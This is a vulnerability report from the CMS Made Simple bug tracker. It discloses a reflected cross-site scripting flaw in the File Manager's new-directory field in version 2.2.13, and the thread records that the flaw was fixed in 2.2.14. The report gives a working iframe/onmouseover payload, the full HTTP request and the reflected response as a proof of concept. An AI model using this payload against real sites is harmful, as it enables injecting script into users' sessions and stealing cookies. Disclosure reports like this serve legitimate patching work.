CMS MADE SIMPLE FORGE

CMS Made Simple Core

 
Back Back to List

[#12224] Reflected Cross-Site Scripting - CMS Made Simple 2.2.13

avatar
Created By: Guram Javakhishvili (guramjava)
Date Submitted: Sun Dec 22 17:19:25 -0500 2019

Assigned To:
Version: 2.2.13
CMSMS Version: 2.2.13
Severity: Minor
Resolution: Fixed
State: Closed
Summary:
Reflected Cross-Site Scripting - CMS Made Simple 2.2.13
Detailed Description:
# Summary:

• Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Reflected
• Date: 22/12/2019
• Author: Guram Javakhishvili
• Email: guramj@gmail.com, misheljava@gmail.com
• Software : CMS Made Simple 2.2.13 
• Product Version: 2.2.13
• Vulnerability Type : Injection
• Vulnerability : Cross Site Scripting (XSS) Reflected

# Description:

CMS Made Simple version 2.2.13  suffer from reflective and persistent (stored)
cross site scripting and html injection vulnerabilities.
Insufficient validation of user input on the authenticated part of the CMS Made
Simple web application exposes the application to Reflected cross site scripting
(XSS) vulnerability.
These vulnerabilities enable potentially dangerous input from the user to be
accepted by the application and then embedded back in the HTML response of the
page returned by the web server.

# Steps to Reproduce:

The attacker needs the appropriate permissions but non-Admin (can be Editor or
Designer user roles) in order to create News, Content, Directory, Shortcuts,
etc.
It was noted that the File Manager function was found to be vulnerable to a
Reflected Cross Site Scripting (XSS) vulnerability.
Login as Designer> click on 'Content' > click on 'File Manager' >  create new
Directory > insert XSS payload into the 'New Directory' field and click create.

List of vulnerable parameter:
	• m1_newdirname

Attack vector:
"/><iframe/onmouseover=alert(document.cookie)>//



# Request:

POST /cmsms-2.2.13/admin/moduleinterface.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101
Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://localhost
Connection: close
Cookie:
6a048a268372a94a595fdec4fbda4134aa83a6e6=39ad8f674b75bdccf8ef6290736c7ac60708435d%3A%3AeyJ1aWQiOjMsInVzZXJuYW1lIjoiZGVzaWduZXIiLCJlZmZfdWlkIjpudWxsLCJlZmZfdXNlcm5hbWUiOm51bGwsImhhc2giOiIkMnkkMTAkS0FPa1NsQTdKSXR2RFRsdVBhSVRJLkhIOE4yMkJtZmYyUC5KczVFMGFGeW5nRmxVVDVmMnEifQ%3D%3D;
__c=7536d3867590a8fcc52; CMSIC1a82b0c9a5=4c765t5v2p4prm6t8v940s15nc;
CMSSESSIDa9ac5a041c5c=ibso1e87pflpck00qt050vmoqj
Upgrade-Insecure-Requests: 1

mact=FileManager%2Cm1_%2Cfileaction%2C0&__c=7536d3867590a8fcc52&m1_fileactionnewdir=&m1_path=%2Fuploads%2Fd&m1_newdirname=%22%2F%3E%3Ciframe%2Fonmouseover%3Dalert%28document.cookie%29%3E%2F%2F&m1_submit=Create



# Snip of HTTP response:

<input type="hidden" name="m1_submit" value="Create" />
</div>

<div class="pageoverflow">
  <p class="pagetext"><label for="newdir">New directory:</label></p>
<p class="pageinput"><input type="text" name="m1_newdirname" id="newdir"
value=""/><iframe/onmouseover=alert(document.cookie)>//" size="40"/></p>
</div>

<div class="pageoverflow">
  <p class="pagetext"></p>
<p class="pageinput"><input class="cms_submit" name="m1_submit" id="m1_submit"
value="Create" type="submit" />


History

Comments
avatar 
Date: 2020-03-01 05:47
Posted By: Guram Javakhishvili (guramjava)

Hi,

Is there any update on this?
avatar 
Date: 2020-03-01 14:03
Posted By: Guram Javakhishvili (guramjava)

Could you please assign CVE to this vulnerability? Thanks.
avatar 
Date: 2020-03-18 11:13
Posted By: Rolf (rolf1)

fixed for 2.2.14
avatar 
Date: 2020-03-21 14:05
Posted By: Guram Javakhishvili (guramjava)

Could you please assign CVE to this vulnerability? Thanks.
avatar 
Date: 2020-03-30 13:12
Posted By: Rolf (rolf1)

CMS Made Simple 2.2.14 is released
avatar 
Date: 2020-05-03 16:01
Posted By: Guram Javakhishvili (guramjava)

Hello,

Is there any update on this? I have been asking for an update since my
submission of the above vulnerability. It is by now over five month since this
vulnerability has been reported to you by myself.
And I would like to ask you if you would let me go public by next week? 
Could you please mark this as PUBLIC?
I also wish to request a CVE number for this vulnerability if that is ok?

If you have any questions please let you know.

Regards,
Guram
Updates

Updated: 2020-03-30 13:12
state: Open => Closed

Updated: 2020-03-18 10:35
resolution_id: 5 => 7
severity_id: 2 => 3
assigned_to_id: 106 => 100

Updated: 2019-12-22 17:57
summary: CMS Made Simple 2.2.13 - Reflected Cross-Site Scripting => Reflected Cross-Site Scripting - CMS Made Simple 2.2.13

Updated: 2019-12-22 17:28
description: # Summary: • Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Reflected • Date: 22/12/2019 • Author: Guram Javakhishvili • Email: guramj@gmail.com • Software : CMS Made Simple 2.2.13 • Product Version: 2.2.13 • Vulnerabil => # Summary: • Title: CMS Made Simple 2.2.13 Cross Site Scripting (XSS) Reflected • Date: 22/12/2019 • Author: Guram Javakhishvili • Email: guramj@gmail.com, misheljava@gmail.com • Software : CMS Made Simple 2.2.13 • Product Version: 2.
resolution_id: => 5
assigned_to_id: 100 => 106